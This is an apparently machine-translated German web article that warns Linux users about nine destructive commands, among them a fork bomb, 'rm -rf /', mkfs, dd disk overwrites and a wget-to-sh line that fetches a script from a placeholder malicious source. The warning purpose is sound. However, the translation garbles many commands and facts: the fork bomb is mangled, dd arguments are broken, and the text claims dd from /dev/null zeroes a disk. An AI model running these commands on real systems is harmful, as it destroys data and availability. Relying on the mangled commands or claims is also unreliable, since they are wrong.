Startseite » Desktop » 9 Linux-Befehle und -Codes, auf die Sie achten sollten

    9 Linux-Befehle und -Codes, auf die Sie achten sollten

    Linux Shell / Terminal-Befehle sind sehr leistungsfähig Ein einfacher Befehl kann dazu führen, dass ein Ordner, Dateien oder ein Stammordner gelöscht wird.

    In einigen Fällen fordert Linux Sie nicht einmal zur Bestätigung auf, sondern führt den Befehl sofort aus, wodurch Sie dazu aufgefordert werden wertvolle Daten und Informationen verlieren in diesen Dateien und Ordnern gespeichert.

    Es ist üblich, dass Menschen Inhalte im Web veröffentlichen Empfiehlt neuen Linux-Benutzern, diese Befehle auszuführen. Dies mag für jemanden, der den Inhalt gepostet hat, wie ein Witz erscheinen, aber für die Person am anderen Ende ist das kein Lachen.

    Wir haben einige Linux-Befehle zusammengestellt, die für Ihr System ziemlich schädlich sind, um sie zu vermeiden. Denken Sie daran, dass sie tatsächlich gefährlich sind Sie können sogar auf verschiedene Arten geändert werden, um neue Befehle zu erzeugen mehr Schaden zufügen.

    Eine wichtige Sache zu beachten ist das Einige dieser Befehle sind nur dann gefährlich, wenn ihnen auf Ubuntu sudo vorangestellt ist. Bei anderen Linux-Distributionen können die meisten dieser Befehle als root ausgeführt werden.

    Schauen Sie sich das an 9 Befehle und Codes, die Sie nicht ausführen sollten.

    1. Linux Fork Bomb Command

    : () : |: & ;: auch bekannt als Gabelbombe ist ein Denial-of-Service-Angriff gegen ein Linux-System. : () : |: & ;: ist eine bash-Funktion. Einmal ausgeführt, es wiederholt sich mehrmals, bis das System einfriert.

    Sie können es nur durch einen Neustart Ihres Systems entfernen. Seien Sie also vorsichtig, wenn Sie diesen Befehl in Ihrer Linux-Shell ausführen.

    2. mv ordner / dev / null befehl

    MV-Ordner / dev / null ist ein weiterer riskanter Befehl. Dev / null oder Nullgerät ist Eine Gerätedatei, die alle darauf geschriebenen Daten verwirft, meldet jedoch, dass der Schreibvorgang erfolgreich ausgeführt wurde. Es ist auch bekannt als etwas geknickt oder schwarzes Loch.

    3. Befehl rm -rf

    rm -rf Befehl ist ein schneller Weg zu einen Ordner und seinen Inhalt löschen im Linux-Betriebssystem. Wenn Sie nicht wissen, wie Sie es richtig verwenden, kann dies für das System sehr gefährlich werden. Die am häufigsten verwendeten Kombinationen und Optionen für den Befehl rm-rf sind unten aufgeführt:

    • rm Befehl wird verwendet, um die Dateien im Linux-System zu löschen.
    • rm -f Befehl entfernt schreibgeschützte Dateien im Ordner ohne Aufforderung.
    • rm -r Befehl löscht den Inhalt eines Ordners rekursiv.
    • rm -d Der Befehl wird zum Entfernen eines leeren Verzeichnisses verwendet. Das Entfernen des Verzeichnisses wird jedoch abgelehnt, wenn es nicht leer ist.
    • rm -rf / Der Befehl wird zum erzwungenen Löschen des gesamten Inhalts im Stammverzeichnis und in den Unterordnern verwendet (er löscht ihn, auch wenn er schreibgeschützt ist).
    • rm -rf * Der Befehl dient zum erzwungenen Löschen des gesamten Inhalts im aktuellen Verzeichnis (Verzeichnis, in dem Sie gerade arbeiten) und in den Unterordnern.
    • rm -rf. Der Befehl wird verwendet, um den gesamten Inhalt des aktuellen Ordners und der Unterordner zu löschen. Das rm -r. [^.] * Befehl kann auch verwendet werden.
    • rm -i Der Befehl wird zum Entfernen von Dateien und Ordnern verwendet. Vor dem Entfernen wird jedoch eine Aufforderung angezeigt.

    4. Befehl mkfs

    mkfs kann ein gefährlicher Befehl für Ihr Linux-basiertes System sein, wenn Sie den Zweck nicht kennen. Alles, was nach den mkfs geschrieben wird, wird formatiert und durch ein leeres Linux-Dateisystem ersetzt.

    Alle unten aufgeführten Befehle formatieren die Festplatte und erfordern Administratorrechte:

    • mkfs
    • mkfs.ext3
    • mkfs.bfs
    • mkfs.ext2
    • mkfs.minix
    • mkfs.msdos
    • mkfs.reiserfs
    • mkfs.vfat

    Der Befehl mkfs.cramfs verhält sich genauso wie oben, erfordert jedoch keine Administratorrechte zur Ausführung.

    5. Teerbombe

    Das Teer Befehl wird verwendet, um mehrere Dateien in einer einzigen Datei (archivierte Datei) in zu kombinieren .Teer Format. Mit diesem Befehl kann eine Tape Archive (Tar) -Bombe erstellt werden.

    Es ist eine Archivdatei, die in Tausende oder Millionen von Dateien mit Namen, die den vorhandenen Dateien ähneln, im aktuellen Verzeichnis explodiert anstatt in ein neues Verzeichnis, wenn nicht getrimmt.

    Sie können vermeiden, Opfer einer Teerbombe zu werden regelmäßig ein neues Schutzverzeichnis erstellen, wenn Sie eine tar-Datei erhalten und verschieben Sie dann die empfangene tar-Datei in dieses Verzeichnis, bevor Sie das Trennen aufheben.

    Wenn es sich bei der tar-Datei tatsächlich um eine tar-Bombe handelt, können Sie einfach das neu erstellte Verzeichnis entfernen, um es zu entfernen. Ein anderer Weg, um die Explosion einer Teerbombe zu vermeiden, ist via das -t Option, um den gesamten Inhalt einer TAR-Datei aufzulisten um Ihnen eine Vorstellung von der Art der Inhalte zu geben, die in der tar-Datei enthalten sind.

    6. Befehl dd

    Das dd Befehl wird verwendet Festplattenpartitionen kopieren und konvertieren. Es kann sich jedoch als schädlich herausstellen, wenn Sie das falsche Ziel angeben.

    Der Befehl kann einer der folgenden sein:

    • dd wenn = / dev / hda = / dev / hdb
    • dd if = / dev / hda von = / dev / sdb
    • dd if = etwas von = / dev / hda
    • dd if = etwas von = / dev / sda

    Mit dem folgenden Befehl wird die gesamte primäre Festplatte auf Null gesetzt: dd wenn = / dev / null von = / dev / hatte

    7. Shell Script Code

    Jemand kann dich zum Opfer bringen Ihnen den Link zu einem Shell-Skript geben und Sie befürworten, es herunterzuladen und auszuführen. Das Skript kann bösartigen oder gefährlichen Code enthalten. Das Format des Befehls kann so aussehen: wget http: // some_malicious_source -O- | Sch. Das wget lädt das Skript herunter, während sh die Skriptausführung herunterlädt.

    8. Bösartiger Quellcode

    Jemand gibt Ihnen den Quellcode und bittet Sie, ihn zu kompilieren. Der Code Es scheint, dass es sich um einen normalen Code handelt, tatsächlich wird jedoch in dem umfangreichen Quellcode bösartiger Code getarnt und es kann zu Schäden an Ihrem System führen. Um zu vermeiden, von dieser Art von Angriff zum Opfer zu fallen, Akzeptieren und kompilieren Sie Ihren Quellcode nur aus vertrauenswürdigen Quellen.

    9. Dekompressionsbombe

    Sie haben eine komprimierte Datei erhalten und werden aufgefordert, diese Datei zu extrahieren, die sehr klein zu sein scheint, aber möglicherweise einige KB groß ist. Eigentlich, Diese kleine komprimierte Datei enthält sehr stark komprimierte Daten.

    Sobald die Datei dekomprimiert ist, werden Hunderte von GB an Daten extrahiert, die die Daten extrahieren kann Ihre Festplatte auffüllen um die Leistung Ihres Systems zu beeinträchtigen. Um diese Situation zu vermeiden, sollten Sie immer Daten aus vertrauenswürdigen Quellen akzeptieren.